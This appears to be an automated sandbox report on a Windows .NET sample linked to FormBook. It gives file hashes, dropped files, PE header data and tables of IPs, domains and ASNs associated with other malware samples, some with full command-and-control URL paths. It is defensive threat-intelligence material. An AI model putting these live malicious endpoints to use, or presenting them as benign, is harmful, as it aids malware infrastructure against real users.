                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    No simulations

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    124.6.61.130Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.comect.online/hmf8/
                                                                                                                                    13.248.169.48cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.bcg.services/5onp/
                                                                                                                                    3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.shipley.group/5g1j/
                                                                                                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
                                                                                                                                    TU0kiz3mxz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
                                                                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.bonheur.tech/t3iv/
                                                                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.bonheur.tech/t3iv/
                                                                                                                                    ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                    • www.londonatnight.coffee/13to/
                                                                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • portlandbeauty.com/
                                                                                                                                    profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.aktmarket.xyz/wb7v/
                                                                                                                                    SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.xphone.net/i7vz/
                                                                                                                                    37.97.254.27Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.dutchdubliners.online/7ujc/
                                                                                                                                    DBROG0eWH7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • orderstream.net/index.php
                                                                                                                                    DBROG0eWH7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • orderstream.net/index.php
                                                                                                                                    WrrCV4QR2J.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.wrautomotive.online/ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0He
                                                                                                                                    Antndte.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    • www.rocsys.net/3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38
                                                                                                                                    hesaphareketi-01.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    • www.rocsys.net/uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==
                                                                                                                                    New_Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw
                                                                                                                                    PO_YTWHDF3432.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.wrautomotive.online/ahec/
                                                                                                                                    PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX
                                                                                                                                    Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                    • www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    www.hsa.worldPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 13.248.169.48
                                                                                                                                    www.allstary.topPO1341489LTB GROUP.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                    • 199.193.6.134
                                                                                                                                    Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 199.193.6.134
                                                                                                                                    ccchhua889911.222tt.icuPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 172.247.112.164
                                                                                                                                    www.sssvip2.shop3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 156.253.8.115
                                                                                                                                    zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 156.253.8.115
                                                                                                                                    Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 156.253.8.115
                                                                                                                                    www.comect.onlinePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 124.6.61.130

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    AMAZON-02USfrosty.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 18.140.171.98
                                                                                                                                    frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 54.189.236.62
                                                                                                                                    Message.emlGet hashmaliciousUnknownBrowse
                                                                                                                                    • 34.249.87.52
                                                                                                                                    frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 18.188.126.130
                                                                                                                                    cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 13.248.169.48
                                                                                                                                    https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 108.138.26.73
                                                                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 3.130.71.34
                                                                                                                                    3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 13.248.169.48
                                                                                                                                    https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                                                                                    • 108.138.26.78
                                                                                                                                    FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 18.143.155.63
                                                                                                                                    CNSERVERSUSarm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.101.86
                                                                                                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.150.24
                                                                                                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.149.53
                                                                                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 41.216.185.130
                                                                                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 41.216.185.178
                                                                                                                                    2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 41.216.185.126
                                                                                                                                    http://www.rr8844.comGet hashmaliciousUnknownBrowse
                                                                                                                                    • 23.224.82.187
                                                                                                                                    botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.125.76
                                                                                                                                    armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 103.228.168.192
                                                                                                                                    la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 154.212.2.112
                                                                                                                                    APC-HOSTING-SGAPCHostingPteLtdSGPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 124.6.61.130
                                                                                                                                    dB5EGM8l20.dllGet hashmaliciousWannacryBrowse
                                                                                                                                    • 103.14.213.194
                                                                                                                                    TRANSIP-ASAmsterdamtheNetherlandsNLDEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 95.170.75.146
                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                    • 95.170.64.27
                                                                                                                                    la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 136.144.153.6
                                                                                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 149.210.163.67
                                                                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 89.41.170.24
                                                                                                                                    m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 95.170.75.146
                                                                                                                                    jade.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 95.170.75.158
                                                                                                                                    jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 95.170.75.161
                                                                                                                                    Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 37.97.254.27
                                                                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 149.210.209.177

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QmBbqpEHu0.exe.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\QmBbqpEHu0.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1415
                                                                                                                                    Entropy (8bit):5.352427679901606
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                                                                                    MD5:97AD91F1C1F572C945DA12233082171D
                                                                                                                                    SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                                                                                    SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                                                                                    SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                                                                                    Malicious:true
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2232
                                                                                                                                    Entropy (8bit):5.376466846542244
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:2WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugePu/ZPUyus:2LHyIFKL3IZ2KRH9OugYs
                                                                                                                                    MD5:2565617F814F64391598DAE1469067C1
                                                                                                                                    SHA1:E9B4D01811BFE663C3252E62CB6A3A85A5B8DFC0
                                                                                                                                    SHA-256:0034DCBF5590745C396F243C34557071B30F874C9D7E84CB2C84ED417FB07E97
                                                                                                                                    SHA-512:BA9087DE41B86341C92D6CA8D53C605AF51A2C89A0C6390D26015A89A54459D7FE75095C8B16EB5A32DA23BEEBAB711BEC4480CFA7C524C3083610132C6C3384
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:@...e..................................._.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                    C:\Users\user\AppData\Local\Temp\3G9s16YI

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\finger.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21uqvuof.ags.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_al1bqxex.yfl.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2g0rrok.24y.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmry1b41.rot.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Entropy (8bit):7.652067313415078
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                    File name:QmBbqpEHu0.exe
                                                                                                                                    File size:916'992 bytes
                                                                                                                                    MD5:eb7415c6ed5d31b69c535afeed1ad3ac
                                                                                                                                    SHA1:11c7e7e4388044514f499bf63af99c6aebe14e13
                                                                                                                                    SHA256:80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89
                                                                                                                                    SHA512:e57199219c8e6828f67a6c2c4167d6d44426571fa7efcff20b904af595fadea18ed42e12176e47a67d4ed26858198d0732b3d804407ef49728e833c22ae82da5
                                                                                                                                    SSDEEP:12288:00MPku+l0CPP/NLsIqFse6TU/L5d+gAk/YoYmw4VsXHC+MsM/VDp6556IgJoxKR:wPd+p/us4z5d+gdYoYbDS+MR9DvZ
                                                                                                                                    TLSH:7D15CFC0373AB711DE7CA670882AEDB823652E787000F9E66DDD27D7759C7126A18F06
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0.................. ... ....@.. .......................`............@................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x4e100a
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x67611FC5 [Tue Dec 17 06:52:53 2024 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe0fb60x4f.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe20000x608.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xded2c0x54.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x20000xdf0100xdf200b35c01be48f0a78a85d9ac359800958cFalse0.8034970238095238data7.659098571397496IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0xe20000x6080x800431474aaa182e56f927621b7a837aff4False0.3359375data3.42174014633411IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
